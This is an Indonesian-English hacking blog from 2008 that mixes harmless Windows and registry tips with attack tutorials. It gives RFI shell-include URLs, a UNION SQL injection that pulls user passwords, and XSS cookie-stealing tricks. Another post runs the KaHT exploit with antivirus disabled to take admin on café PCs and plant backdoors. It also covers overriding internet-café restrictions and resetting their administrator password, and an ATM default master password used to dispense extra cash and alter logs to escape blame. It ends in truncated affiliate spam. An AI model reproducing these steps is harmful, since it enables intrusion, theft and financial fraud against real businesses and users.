Aneuk Lhox's Blog

Web Hacking

2008-03-31T20:30:00.000-07:00

Things to know:

=- Vulnerability : a security hole, can be exploited to change the way the webapp / software works / functions.

=- CMS's, Forums uses DataBases to store the info like users, posts, threads, messages and so on, its usually / mostly a MySQL server.

=- RFI [ Remote File Inclusion ] : a malicious user can include a 'bad' code to be executed on the vulnerable site.

=- LFI [ Local File Inclusion ] : a malicious user can open any file on the server.

=- SQL Injection : Injecting a MySQL query to bypass or get more info from a DataBase.

=- XSS [ Cross Site Scripting ] : if it was a permanent vulnerability, where the users input is saved, the user can log cookies, IP, and much more...

=- Exploit : a script made to maliciously use a vulnerability.

We are going to take each vulnerability, and take alook at what goes wrong with the web developer, that made the script vulnerable...

=- RFI ::

RFI's are exploited by including a 'bad' code from another site, to the infected site, for example you can include a PHP-Shell, and execute command on the server using it...

this vulnerability is very dangerous, a site infected with it can be compromised easily...

an example of a code infected with a RFI:

Code:

as you can see, we are taking the variable page, and including it, now that script will work great and do what it's supposed to do, for example:

www.example.com/index.dmz?page=contact.dmz

this would open contact.dmz, BUT, what would a malicious user do?

http://www.example.com/index.dmz?pag...com/shell.txt?

the shell code must be in a txt file, because this way the code will be parsed / executed on the vulnerable site.

what happens then?

Code:

that text file gets included, so lets say the shell.txt had the following code:

"; ?>

a small text box would appear on the page, with a button, that would execute commands... the user can compromise the full site using this simple text box, if he had enough privs, he can do the following:

rm -rf

and delete your files...

some devs, think they can fix the vulnerability by doing the following:

Code:

this way, you can only include .php files, and that is not really a big deal cause PHP gets parsed on the server side...

but, that wont stop some people, there is something called a NullByte, that would simply tell PHP to ignore anything after it... if someone wanted to exploit that code, he would do:

http://www.darkmindz.com/index.dmz?p.../shell.txt?

as you can see, the [ ] is the NullByte, that would get parsed this way:

Code:

so the question now, is how to completely secure this URL system?!

well, you can use a switch statement, and this way, anything other than what is already stated, wont be included.. ex:

Code:

that is a perfect system, simple, secure, and works

now that is done, RFI, is just like LFI, nothing is different, but the fact that LFI only gets the pages from the server, most of the times download scripts are infected with LFI, cause they are made to readfile(); whatever it was lol.. which is just bad coding...

Now moving to SQL injections, those are deadly when E-Commerce sites are infected with them!!

a malicious user would exploit an infected code, by bypassing a login form, and logging in as admin.

or by injecting the URL so he can execute MySQL query's, which would let him gain access to Users info, and so on ...

example of vulnerable code:

Code:

now, as you can see, it takes the 'id' variable, and query's it, with no filters at all!!!

now if i wanted to inject it, i would first check for the vulnerability.... by doing the following:

www.example.com/page.php?id=1 OR 2

IF 2 news was there, then am lucky , and here comes the good part, where the information gets extracted, using a UNION command, i can select from another column, and echo it there...

so an injection would be:

www.example.com/page.php?id=1 OR 2 UNION SELECT name,1,password,email FROM users

this would echo the passwords, to the page. now depending on the number of rows in the news column, i will need to change the number of rows selected...

so now we know what went wrong, lets secure it!!

Code:

that is it, this code is secure...

now moving to XSS, it is not really a big issue UNLESS it was permanent!

example of permanent XSS would be in a guestbook, comments, contact forms, mailing lists, etc...

what can the malicious user do?

well, he can use a javascript to change title, forms, prices, hidden data, pages, actions, and even worse, log the page!
some CMS's and Forums, uses cookies and store the users info in them, if that site was vulnerable to XSS, the attacker can gain admin privs by logging the admin cookies...

a vulnerable code would be:

Code:

"; echo $message; } echo " "; ?>

ok, so now a malicious user could do the following:

submit the following text to test for vulnerability :

Code:

or

Code:

Nice Website!

IF the HTML gets parsed "and it will in this code" , the attacker will now move to the next step, which is logging the page.. by redirecting it to a logger..

some methods of bypassing some filters, for example, if the form only submits links, lets take this one as an example:

Code:
"; echo "Link";; } echo " "; ?>

now that should not parse anything, but simply wrap it in a link right?

well, i don't think so, you can simply bypass it using:

Code:
'>

why does that bypass it?!

here is what happens, the Code:
'>

will stop the a tag, and then you can open anything else...

here is the result:

Code:
'>Link

as you can see, the a tag got closed, which allowed me to open another tag, which is a script here. and it works

Well, we are done now , i hope you enjoyed this tutorial, and learned something new from it... questions?

Tips-Trik CMD : Membuat JAMcmd

2008-03-29T11:55:00.000-07:00

Hola….., wah.. pasti banyak yang udah kangen (mungkin tidak samasekali) sama saya n gak sabar pengen liat tutorial keren lagi (huh..GR banget mas..). OK, langsung saja kita ke masalahnya, tapi sebelumnya saya pengen cerita dikit tentang munculnya ide gila ini.

Begini ceritanya…………………..waktu itu, di malam gelap gulita aku sedang memanjat pohon semangka yang sangaaat tinggi.. tiba-tiba aku dikagetkan oleh sesuatu yang sangat-sangat mengerikan. Sebuah sosok berambut hitam berkacamata datang menghampiriku dan waw..ternyata seorang wanita cantik. Saat itu aku terkesima ketika dia sedang mandi di sungai dan aku berniat untuk mencuri pakaiannya..tapi begitu saya hendak mengambilnya ada saja yang menggagalkan misi gila itu..emak aku menyiramku dengan segalon air dan akupun terbangun..yach buyar deh Ceritanya..tapi gpp masih ada cerita yang jauh lebih gak nyambung n’ ide yang lebih gila lagi, on next Tut’s tentunya..

Langsung saja kita jangan berlama-lama lagi dengan cerita bodoh diatas, coz bikin kamu tambah bingung n tidak fokus..Kembali ke Judulnya: Membuat JAMcmd, pasti tambah bingung, apaan sich ??.. gw juga gak tau mau jelasin apa tentang jamCMD ini, kita liat aja yuk codenya biar ngerti….

HERE is THE CODE

(tested on Windows XP sp 2)

———————- start ————————-

@echo off

start /b “%comspec%”

:update

set _time=%time:~0,8%

title Time : [ %_time% ] @ [ %date% ]

ping localhost -n 2 -w 500 >nul

goto update

———————– end ————————–

Lah, segitu aja, panjang ceritanya daripada codenya..dasar ide gila

Save dengan extensi .bat

Contoh : JamCMD.bat

Copykan ke directory windows (c:\windows) supaya bisa dipanggil lewat menu RUN

START –> RUN, truz tinggal ketik jamcmd…

Oiya..kalau mau decompile jadi .exe juga bisa pake QuickBatchFileCompiler donlot di

Link : http://www.abyssmedia.com/quickbfc

Sekarang ke bab penjelasan..

Hmmm..

Tapi perasan gak ada yang bedanya dengan cmd biasa..

..eits tunggu dulu, coba perhatikan lagi windowtitlenya bertuliskan “Time : [7:01:53] @ [ 30 Jul 07 ]”

Nah itu dia bedanya, windowtitlenya ada jam dan tanggalnya yang selalu terupdate..

b). Penjelasan Code

1. echo off – digunakan agar perintah tidak menampilkan pesan setelah dijalankan (berlaku untuk perintah setelah/dibawah echo off).

2. Start – untuk menjalankan suatu program (%comspec% adalah cmd, jadi kita menjalankan cmd).

3. @ - sama dengan echo off tapi hanya untuk perintah dibelakangnya.

4. :update – memberi label update pada script untuk looping.

5. Set – untuk menampilkan, mengeset, atau menghapus nilai dari suatu variable (pada kali ini kita menggunakan variable “_time”).

6. Title – untuk mengganti windowtitle CommandPrompt.

7. Ping – sebenarnya untuk koneksi internet, tapi kita akali agar menggantikan pause selama 1 detik (di cmd tidak ada perintah untuk melakukan pause).

8. Goto – untuk melakukan looping/perulangan/kembali ke label “update”

Segitu aja yah penjelasannya, kalau ada yang belum jelas tanyaiin aja ke forum PemrogramanLain..oks

Tutorial Registry: memodifikasi content menu new

2008-03-29T11:51:00.002-07:00

(context menu = menu yang muncul pada saat kita mengklik kanan)

Kalau Anda mengklik kanan pada desktop dan memilih New, maka akan terlihat banyak submenu untuk pembuatan aneka dokumen. Misalnya MS Word, Text Document, Corel Draw, dan lain-lain. Semakin banyak aplikasi yang diinstall semakin banyak pula deretan submenu tersebut.

Anda bisa memodifikasi submenu document sesuai keinginan Anda. Misalnya menghapus submenu (dari) document yang jarang Anda buka/buat. Bisa juga menambahkan bila belum terdapat pada submenu tersebut. Ada pun cara untuk menghapus submenu tersebut adalah sebagai berikut :

Jalankan registry editor.
Dari menu Edit, klik Find.
Tuliskan ShellNew, klik OK.
Setelah itu Anda bisa menghapus subkey ShellNew yang ditemukan oleh registry editor tersebut.

Tutorial Registry:

2008-03-29T11:51:00.000-07:00

(context menu = menu yang muncul pada saat kita mengklik kanan)

Jalankan registry editor.
Dari menu Edit, klik Find.
Tuliskan ShellNew, klik OK.
Setelah itu Anda bisa menghapus subkey ShellNew yang ditemukan oleh registry editor tersebut.

Mendapatkan Akses Admin di Windows XP

2008-03-29T09:14:00.001-07:00

Terkadang dalam suatu warnet atau Lab atau bahkan kost. yang menggunakan WIndows XP, biasanya pengguna diberikan akses guest atau limited account. Untuk ngeburn CD atau klo mo nginstall program kita ngga akan bisa, karena aksesnya bukan admin. Kadang-kadang ngeselin juga klo kayak gitu, jadi ngga bisa ngapa-ngapain, Burn CD ga bisa, jalanin program ga bisa, pokoknya terbatas banget :(...

gue mo ngasih tips gimana caranya dapetin akses admin yang memanfaatkan kelemahan di Windows XP. Mungkin yg master dah pada tau tips ini, tapi kan ngga semuanya master ;p... gue cuma mo bagi-bagi ilmu aja, siapa tau ada gunanya. Tapi penulis ngga bertanggung jawab klo ada yang menggunakan untuk hal-hal yang kurang bertanggung jawab, tutorial ini cuman untuk iseng-iseng aja, he...

Apa aja yang dibutuhin ?
1. Komputer??
2. Hoki, karena cuman WinXP yg blm di Update aja (ato yg masih Vulner yg bisa diakses)
3. Uang, buat jajan n kewarnet (atau klo mau, bisa ngehack bilingnya, bisa ga pake uang kan... tp bisa2 lo ketangkep)

Langkan pertama lo butuh program exloit KaHT yg dibuat oleh Kralor, KaHT tuh bisa 'NyeCan' beberapa Host, trus dicari mana yg 'Vulner', n jalanin exploit di Host yg Vulner itu. Klo Linknya ga bisa, coba Googling aja, banyak ko, atau klo msh g dpt juga email aja ke gue! klo dah dapet, trus jalanin cmd lewat Run (Start > Run > cmd). Sebelumnya jangan lupa untuk men-disable antivirus, karena kaht dikenali sebagai trojan. Misalkan program kaht ada di drive C, folder kaht, maka pertintahnya sbb:

C:\kaht>kaht 127.0.0.0 127.0.0.1

--> artinya scan Ip dari 127.0.0.0 sampai 127.0.0.1 (127.0.0.1 adalah IP untuk Loopback, artinya kaht melakukan scanning untuk komputer itu sendiri)

Bisa juga untuk Scanning jaringan tertentu misalnya

kaht 192.168.0.0 192.168.0.100

Klo berhasil, lo bakal dapet akses admin..

C:\Windows\system32>

coba check IP nya (ipconfig), apa ini komputer kita ???

TaRaa.... yup, 'Admin Under Control' hehe... dapet deh akses admin :D
Klo dah gini lo bisa ngapain aja lewat komputer itu. Mo, ngeBurn CD, mo liat-liat file yg di 'protect' admin (siapa tau aja ada file2 yg menarik), mo buat user dgn akses admin, atau buat Backdoor biar klo Login usernya punya akses admin.... Atau lo bisa ngisengin temen lo yang satu jaringan (LAN), bisa juga curangin waktu maen game di jaringan... hehe.. kan seru tuh!!

Mengembalikan Boot Manager Windows XP

2008-03-29T09:03:00.000-07:00

Dalam satu komputer yang terdapat lebih dari satu OS (Operating System), biasanya terdapat boot manager untuk memilih OS yang akan digunakan. Untuk Komputer yang terdiri dari Windows 98/Me dengan windows XP, terdapat Boot manager yang akan memberi pilihan OS yang akan dipilih. Bagi orang yang sering gonta-ganti OS, hal ini menjadi masalah keitka Boot Manager tidak berjalan dengan baik dan tidak dapat masuk ke Windows XP. Atau jika ingin menginstall Windows 98 tanpa mau kehilangan XP (Instalasi Windows 98 akan mengakibatkan tidak dapat boot ke Windows XP). Berikut adalah cara yang dapat digunakan untuk menginstall Boot Manager agar dapat boot ke windwos XP.

Boot computer menggunakan CD Installer Windows XP (seperti ketika install Windows XP). Setelah proses inisiasi, pilih (R) Recovery. Setelah itu, akan diminta password Administrator. Setelah berhasil, maka akan muncul prompt (C:\Windows>). Setelah itu ketikkan perintah :

fixmbr

bootcfg /rebuild

Setelah itu keluar dengan menggunakan perintah exit .

Reboot kembali komputer anda. Boot Manager akan kembali seperti semula

tutorial Registry I

2008-03-29T07:28:00.000-07:00

Windows merupakan sistem operasi untuk PC yang paling populer saat ini, mulai dari Windows 95, 98, NT dan yang baru saja diluncurkan yaitu Windows 2000 dan Windows Millenium. Salah satu keunggulan Windows adalah kemudahan dalam penggunaannya. Misalnya kemudahan mulai dari install, konfigurasi sampai dengan adanya feature plug and play untuk hardware.

Tentunya semua konfigurasi dan setting tersebut disimpan dalam sistem operasi, dan untuk menyimpan informasi berbagai setting dan konfigurasi, Windows menggunakan registry. Registry merupakan database yang digunakan untuk menyimpan semua setting dan informasi hardware, software dan berbagai preferences untuk Windows 32 bit, termasuk Window 95, 98, NT, Millenium dan 2000. Salah satu contohnya adalah misalnya seseorang mengganti assosiasi file atau menginstall program, maka perubahan setting tersebut akan dituliskan pada registry. Contoh lainnya adalah mendisable Display Properties, menyembunyikan berbagai menu pada Menu Start.

Selain sebagai tempat untuk menyimpan informasi sistem operasi Windows sendiri, registry juga digunakan sebagai tempat untuk menyimpan berbagai informasi setting dan konfigurasi pada aplikasi atau program. Misalnya WinZip menggunakan registry untuk menyimpan informasi toolbar, aplikasi untuk membuka file (viewer), user name, serial number, dan lain-lain.

Registry diletakkan pada dua buah hidden file yaitu user.dat dan system.dat yang terletak pada directory Windows untuk Win 95/98/Me dan pada directory Windows/System32/Config untuk Windows NT. Selain menggunakan registry (system.dat dan user.dat), Windows juga menyimpan informasi setting tertentu pada file msdos.sys, system.ini dan win.ini.

Membuat Program yang dapat mengcopy dirinya sendiri

2008-03-28T00:06:00.000-07:00

MEMBUAT PROGRAM YANG DAPAT MENGCOPY DIRINYA OTOMATIS

Source code program dalam DELPHI. Program ini akan mengcopy dirinya otomatis ke tempat yang dinginkan.. yeah mirip-mirip worm gitu deech.. ;) Thanks to CodeMaker .. Great work man ;)

var
Form1: TForm1;
ExeString: String;

implementation

{$R *.DFM}
///////////////////////////////////////////////

procedure Extract(A,B: String;Var C,D: String);
Var
E,F: Integer;
begin
if Pos(uppercase(A),C) > 0 then
begin
E := Pos(uppercase(A),C)+length(A);
F := Pos(uppercase(B),C);
D := Copy(C,E,F-E);
end;
end;
////////////////////////////////////

procedure Exe2String(var A:String);
Var
ExeStream: TFileStream;
MyStream: TMemoryStream;
begin
ExeStream:=TFileStream.Create(Application.ExeName,fmOpenRead or
fmShareDenyNone);
Try
SetLength(A, ExeStream.Size);
ExeStream.ReadBuffer(Pointer(A)^, ExeStream.Size);
Finally
ExeStream.Free;
end;
end;
///////////////////////////////////////////

procedure Delay(ms : longint);
var
TheTime : LongInt;
begin
TheTime := GetTickCount + ms;
while GetTickCount < TheTime do
Application.ProcessMessages;
end;
//////////////////////////////////////////////

////////////////////////////////////////////////////////////////////////////////
procedure TForm1.FormCreate(Sender: TObject);
Var
MyStream: TMemoryStream;
name,C,Temp: String;
D,E: integer;
begin
exe2String(ExeString);////////////////////////////Get entire exe file from HD
//and store in global variable
//ExeString.

if pos(uppercase('soname'),exestring) > 0 then //Check if exe contains a
begin //users name already
and if
delay(500); //it does then see if
the
if pos('_clone',application.exename) = 0 then //running exe is a temporary
begin //clone program.. if
it is
not
name := application.exename; //a clone then attempt to delete
Insert('_clone',name,(length(name)-3)); //any clone that may be in the
deletefile(name); //applications directory. This
end; //ensures that no clone will
//ever remain after exe has
//been customized.....

//////////////////////////////////////////////

edit1.visible := false; ///////////////////////It has been determined that
form1.color := $00c6aa84; //the running exe has already been
form1.height := 300; //customized..so alter the exe's
//appearance to reflect that fact
//This is where you put any setup code you want
//to run when it has been determined that the exe
//has ALREADY been modified! Code to check for a
//valid usename+key,to alter the exe's appearance
//or whatever you want to do to change the way the
//now modified prog is to act should be done HERE!end;

//////////////////////////////////////////////

//The code below runs IF it is determined that the currently running exe is
//a temporary clone program..... this code will delete the original exe file
//from the HD and then save a new copy of itself to the HD with the original
//exe name...DO NOT REMOVE THE delay(500) line! The program will fail sometimes
//if you do! Since the currently running exe is a clone that means it already
//has been modified and in fact is identical to the final exe that it is saving
//to disk with the original name... as soon as the new exe is saved to disk
//this code runs it...then immediately terminates itself .. the clone commits
//hari kiri :-) and since every time a customized exe starts up it attempts
//to delete it's clone from the current directory this clones remaining life
//on disk is limited to 1/2 second......
if pos('_CLONE',uppercase(application.exename)) <> 0 then
begin
delay(500);
name := application.exename;
Delete(name,length(name)-9,6);
if deletefile(name) then
begin
MyStream := TMemoryStream.Create;
try
MyStream.WriteBuffer(Pointer(ExeString)^, Length(ExeString));
MyStream.savetofile(name);
finally
MyStream.Free;
ShellExecute(Handle, 'open',
pchar(name), nil, nil, SW_SHOWNORMAL);
application.terminate
end;
end
else showmessage(name+' not found');//this displays if it was determined that
//the running exe is a clone but for some
//crazy reason the original exe file is
//not found in the current directory :-(

end;

//The code below extracts the user name string from the exe file
//and displays it as a caption...but you could retrieve whatever
//data you had stored and do whatever you want with it :-)

if Pos(uppercase('soname'),exestring) > 0 then //Extract Name string
begin //from exe file and
Extract('soname','eoname',ExeString,Temp); //display as the button
SpeedButton1.Caption := 'Program is Registered to '+Temp;//caption :-)
end;
end;
////////////////////////////////////////////////////

//The code in the SpeedButton event handler below modifies the string held in
//the global variable ExeString...this string contains the entire exe file as
//string data...it modifies ExeString by adding data to it's end... the data is
//held between the demarcators 'SONAME' and 'EONAME' these mark off the data
//and make it possible to find it later and extract it from the running exe
//After ExeString is modified it is saved to a new file in the current directory
//with the exe's name plus '_clone' so if the exe name is myprog.exe the clone
//that is saved will be myprog_clone.exe... as soon as the clone exe is saved
//to disk the program runs it and then terminates itself :-)
//The reason uppercase('soname') is used is because the program would find the
//data 'SONAME' at the wrong point in the exe file if you did not do it this way
//ditto for uppercase('eoname') this is an IMPORTANT POINT!

procedure TForm1.SpeedButton1Click(Sender: TObject);
var
MyStream: TMemoryStream;
MyFile,newname: string;
A,B: Integer;
begin
If Speedbutton1.Caption <> 'Enter Your Name Below Then Click Here To
Customize Exe'then
begin
exit;
end;
begin
if edit1.text = '' then
begin
showmessage('Please enter a name in the Edit Box!');
exit;
end;
MyStream := TMemoryStream.Create;
try
//in line below you tack on the new data :-)
ExeString := ExeString + uppercase('soname') + Edit1.Text
+ uppercase('eoname');

MyStream.Clear;
MyStream.WriteBuffer(Pointer(ExeString)^,
Length(ExeString));//string
2 stream

newname := application.exename; //change name to make it a clone!
Insert('_clone',newname,length(application.exename)-3);

MyStream.savetofile(newname);//save stream to file as a temporary
clone!
finally
MyStream.Free;
end;

ShellExecute(Handle, 'open', //run the clone you just
saved!
pchar(newname), nil, nil, SW_SHOWNORMAL);

application.terminate; //die little proggie
die! :-)
end;

Billing Internet

2008-03-26T22:26:00.000-07:00

Sering kita ke warnet yang banyak mengunci berbagai akses seperti windows explorer tidak bisa dibuka,
klik kanan di desktop tidak bisa, klik kanan di folderpun tidak bisa...betapa sedihnyakan... apalagi bagi saya yang telah terbiasa dengan shortcut windows xp, misalnya membuka windows explorer:
Win +E, membuka run: Win +R, mencari file di dalam harddisk Win +F, yang mana tombol Win terletak antara
tombol Ctrl dan tombol alt. ingin tahu caranya...nih silakan coba...
Sebenarnya cara ini telah lama saya coba dan ternyata berhasil (praktek di komputer sendiri dan beberapa warnet yang menggunakan billing explorer) Mohon maaf kepada pembuat Billing Explorer...untuk tidak berpanjang lebar langsung aja ya...
==> Pertama Buka GPEdit.msc dulu
1. Jika Klik Kanan di Desktop tidak bisa
Masuk Ke GPEdit.msc
Masuk ke [User Configuration/Administrative Templates/Desktop]
- Disable (Hide and disable all items on the desktop)

Jika MyComputer tidak ada
- Disable (Remove My Computer icon on the Desktop)

2. Jika Ingin mengubah properties pada taskbar start menu
masuk ke [User Configuration/Administrative Templates/Start Menu and Taskbar]
- Disable (Prevent changes to Taskbar and Start Menu Settings)

Jika Menu Run tidak muncul
- Disable (Remove Run menu from Start Menu)

Jika menu pada taskbar saat klik kanan tidak muncul
- Disable (Remove access to the context menus for the taskbar)
3. Apabila Control Panel tidak bisa di akses
Masuk ke [User Configuration/Administrative Templates/Control Panel]
- Disable (Prohibit access to the Control Panel)

4. Jika Command Prompt tidak bisa di akses
Masuk ke [User Configuration/Administrative Templates/System]
- Disable (Prevent access to the command prompt)

Jika Registry Editor tidak bisa di akses
- Disable (Prevent access to registry editing tools)

5. Jika Task Manager tidak bisa di akses
Masuk ke [User Configuration/Administrative Templates/System/Ctrl+Alt+Del Options]
- Disable (Remove Task Manager)

6. Jika Folder Options pada Windows Explorer tidak muncul
Masuk ke [User Configuration/Administrative Templates/Windows Component/Windows Explorer]
- Disable (Remove these Folder Options menu item from the Tools menu)

Jika Windows Key tidak berfungsi
- Disable (Turn off Windows+X hotkeys)

==> Setelah GPEdit.msc terbuka baru buka Registry Tools
caranya:
C:\Windows\System32\regedit.exe <-- double Click --- atau --- C:\Windows\regedit.exe <-- double Click Regedit4

[HKEY_LOCAL_MACHINE\Software\ResearchMachines\NOATTRIB.VXD]
"loadvxd"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDrives"=dword:00000000
"LinkResolveIgnoreLinkInfo"=dword:00000000
"NoFolderOptions"=dword:00000000
"ClearRecentDocsOnExit"=dword:00000000
"NoTrayContextMenu"=dword:00000000
"EnforceShellExtensionSecurity"=dword:00000000
"NoPrinterTabs"=dword:00000000
"NoDeletePrinter"=dword:00000000
"NoAddPrinter"=dword:00000000
"NoRun"=dword:00000000
"NoSetFolders"=dword:00000000
"NoSetTaskbar"=dword:00000000
"NoClose"=dword:00000000
"NoViewContextMenu"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
"NoDispScrSavPage"=dword:00000000
"NoDispAppearancePage"=dword:00000000
"NoDispSettingsPage"=dword:00000000
"NoAdminPage"=dword:00000000
"NoProfilePage"=dword:00000000
"NoDevMgrPage"=dword:00000000
"NoConfigPage"=dword:0000000
"NoFileSysPage"=dword:00000000
"NoDispCPL"=dword:00000000
"NoDispBackgroundPage"=dword:00000000
"NoVirtMemPage"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network]
"NoFileSharingControl"=dword:00000000
"NoPrintSharingControl"=dword:00000000
"NoNetSetup"=dword:00000000
"NoNetSetupIDPage"=dword:00000000
"NoNetSetupSecurityPage"=dword:00000000
"NoEntireNetwork"=dword:00000000
"NoWorkgroupContents"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"NoRealMode"=dword:00000000
"Disable"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop]
"NoHTMLWallPaper"=dword:00000000
"NoChangingWallPaper"=dword:00000000
"NoCloseDragDropBands"=dword:00000000
"NoMovingBands"=dword:00000000
"NoAddingComponents"=dword:00000000
"NoDeletingComponents"=dword:00000000
"NoEditingComponents"=dword:00000000
"NoClosingComponents"=dword:00000000

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:00000000

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableCMD"=dword:00000000
"DisableRegistryTools"=dword:00000000

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Advanced]
"Hidden"=dword:00000000
"HideFileExt"=dword:00000000
"ShowSuperHidden"=dword:00000000

==> Setelah regedit.exe terbuka baru ubah password administrator <-- (Ini yang di tunggu2x) caranya: C:\Windows\System32\compmgmt.msc <-- double Click Pilih: - Computer Management (Local)/System Tools/Local Users and Groups/User

- Klik kanan Administrator -> Set Password

- Ketik New Password: **********
Confirm Password: **********

Selesai deh!!!!!!!!!!!!!

Jika tidak bisa sama sekali klik kanan di Windows Explorer masih ada trik tertentu
caranya:
- Masuk ke Folder misalnya: C:/Windows/System32
- Trus klik salah satu file dalam folder itu
misalnya: TaskMgr.exe
- Kemudian klik menu File pada Win Explorer
- Run as...
- Klik The following user -> Masukkan passwordnya
Username: Administrator
Password: ********
- Selesai
NB: Cara ini dilakukan jika kita sudah mendapatkan password administrator seperti yang telah
kita pelajari di atas. jika semua cara di atas masih ngga bisa jg berarti masih ada cara
lain silakan anda temukan sendiri, selamat mencoba

Contoh lain2nya dibawah ini...........

1. Membuka MSConfig dari Windows Explorer
Caranya:
C:\WINDOWS\pchealth\helpctr\binaries\MSConfig.exe

2. Membuka Sysedit dari Windows Explorer
Caranya:
C:\Windows\System32\Sysedit.exe

3. Membuka Task Manager
Caranya:
C:\Windows\System32\taskmgr.exe

4. Membuka Services.msc
Caranya:
C:\Windows\System32\services.msc

5. Membuka Disk Management System (Melihat Partisi Harddisk)
Caranya:
C:\Windows\System32\diskmgmt.msc

6. Membuka Computer Management Services
Caranya:
C:\Windows\System32\compmgmt.msc

7. Membuka Shortcut to desktop
Caranya:
C:\Windows\System32\Show Desktop

8. Membuka Defragment
Caranya
C:\Windows\System32\dfrg.msc

ATM hacking

2008-03-26T21:41:00.001-07:00

Apa itu ATM Machine?

Kepanjangan nya adalah Auto Teller Machine ..

Sebuah mesin yang bisa dikatakan sebagai Bank Mini .. Hehehe ..

Sebuah mesin yang kayaknya udah gak perlu diceritain lagi deh apa dan bagaimananya, karena saya rasa semua orang sudah tahu mengenai mesin ini ..

Yang jelas dengan mesin ini, kalian bisa mengambil duit, tanpa harus pergi ke bank dan melakukan banyak hal lain yang menurut saya pribadi adalah melelahkan .. Ngisi form lah, apalah .. Capek dude xD~~

Nah, sering kali tuh terjadi rumor .. Bisa gak sih ATM di Hack??!

Gimana sih caranya?? Dalam kesempatan kali ini, saya akan membuat sebuah tutorial dan artikel bersifat informatif singkat berkenaan dengan kemungkinan hacking ATM Machine itu sendiri .. Sebenarnya ada banyak cara, dan kebanyakan cara bisa anda lihat di http://www.sate.name .. Tapi dalam kesempatan kali ini, saya akan sedikit membahas mengenai masalah teknis yang ada xD~~

So .. Lets start the GAME xD~~

Hal ini hanya bekerja untuk mesin tipe Tranax Minibank 1500 Series ..

Kalau anda teliti .. Anda bisa mendapatkan sebuah informasi penting dari series yang saya berikan diatas xD~~

Berikut adalah cuplikan dari Manual Book yang saya baca:

To access the Operator Function menu, hold the , and keys simultaneously for 2 seconds, release them and press 1, then press 2, then press 3. The timing of this procedure can be difficult at first.

Jadi intinya untuk masuk kedalam Operator Function pada ATM Machine tipe ini, anda perlu menekan tombol , dan secara bersamaan selama 2 detik, lepaskan mereka, dan tekan tombol 1, kemudian 2, dan 3. Mungkin timing awalnya akan susah pada saat anda mencoba pertama kali .. xD~~

Kalau anda kesulitan untuk login ..

Cara kasarnya juga ada .. Wakakaka ..

Matikan power ATM mesin, buka saja penutup ATM, copot kertas untuk printernya, pasangkan kembali, dan pada saat anda menyalakan kembali ATM, dia akan lgsg masuk pada Operator Function ..

Susah memang ..

But no pain .. No gain right?? xD~~

Setelah masuk ke dalam Operator Function .. Anda akan ditanyai 3 jenis password, yang mana anda dapat memilih 1 dari antara 3 itu:

- Operator Password (Ini untuk meng-akses menu dasar struktur ATM)

- Service Password (Mengijinkan akses ke menu dasar dan diagnostic menu)

- Master Password (Mengijinkan anda mengakses penuh mesin tersebut)

Disini adalah kunci dari pembicaraan kita ..

Pada mesin Tranax MiniBank 1500 Series .. Default Master Password nya adalah "000000" (Tanpa kutip) .. Dan saya rasa tidak banyak yang merubah default password itu, Hehehe ..

Dari sana anda bisa melakukan banyak hal ..

Termasuk diantaranya "reset the status of the cash cartridges" .. Yang dimana membuat anda mgkn saja melakukan pengambilan uang sebesar 100rb namun anda mendapatkan 400rb karena anda membuat cashingnya menjadi 4x lipat lebih banyak .. Namun bank akan hanya me-reduce uang anda sebanyak 100rb sesuai request anda .. Hehehehe ..

Menarik bukan??!

Wakakaka ..

Perihal .. Bagaimana apabila kita terlacak??

Dengan Master Password, anda bisa merubah jam transaksi, merubah entire timing dan printing data ATM, dll dsb dst .. Yah, kreasikan sendiri utk bisa kabur dr tuduhan .. Jadi intinya, yang perlu anda takuti adalah .. Security Cameras

NB: Tutorial ini hanya dibuat untuk pembelajaran dan pembuktian bahwa ATM Hacking itu mgkn terjadi. Oleh dari karena itu kami tidak membahas jauh lebih men-detail, berikut juga merupakan sebuah bukti bahwa "Lubang" keamanan ini sedang sedemikian rupa di patch oleh pihak Tranax: Baca Disini!!! .. Sekian

Menampilkan ekstensi file

2008-03-26T19:26:00.000-07:00

Ekstensi file dapat dikatakan sebagai pengenal jenis file. Misalnya .doc untuk file MS Word, .cdr untuk Corel Draw, dan sebagainya (lihat juga di sini). Secara default ekstensi file tesebut tidak akan kelihatan. Tetapi Anda bisa menampilkan ekstensi file tersebut sehingga Anda bisa lebih memahami tentang ekstensi file pada Windows Anda. Caranya sebagai berikut :

1. Dari Windows Explorer, klik menu View, pilih Folder Options.
2. Hilangkan tanda check (chenthang) pada bagian Hide file ekstention for known file types untuk menyembunyikan ekstensi file.
3. Sebaliknya beri tanda check untuk menyembunyikan ekstensi file dan menampilkan ekstensi file hanya untuk file yang tidak diketahui jenisnya.

2008-03-26T04:15:00.000-07:00

Technorati Profile

www.blogdigger.com

2008-03-26T03:35:00.000-07:00

2008-03-26T03:18:00.000-07:00

Google

2008-03-26T00:51:00.001-07:00

Look for MONEY without CAPITAL???Many people will carry out the business am waiting terkumpul him capital.How with you whether like most people???Do you want to do business with without capital OR could money without capital???Many people mensangsikan that.But for you a person netter, that will become the reality.Please PROVE by joining programs is supervised this.

Make money bisnis online from earn profit earning affiliate programsThere is no doubt that the most successful group amongst online entrepreneurs are affiliates. Few are willing to go public about it but it is widely known that that there are a number of affiliates comfortably raking in hundreds of thousands of dollars in income every year. Actually there is one very powerful advantage that online entrepreneurs involved in affiliate programs have over their counterparts earning from their own ecommerce web sites. And that is the fact that people are usually bound to believe a person referring another web site to them much more easily and quickly than one trying to promote their own site. This coupled with the fact that the Internet is an amazingly powerful referral marketing tool has made the rise of online affiliates phenomenal within such a short time. But there is one major stumbling block that affiliates face today. And that is how to advertise their programs or how to generate enough sales leads. To be successful in any online venture a person needs numerous leads on an ongoing basis, that way they will have a chance of turning as many of them as possible into actual sales. Many affiliates generate leads by finding ways of harvesting email addresses of visitors to their web sites to create an 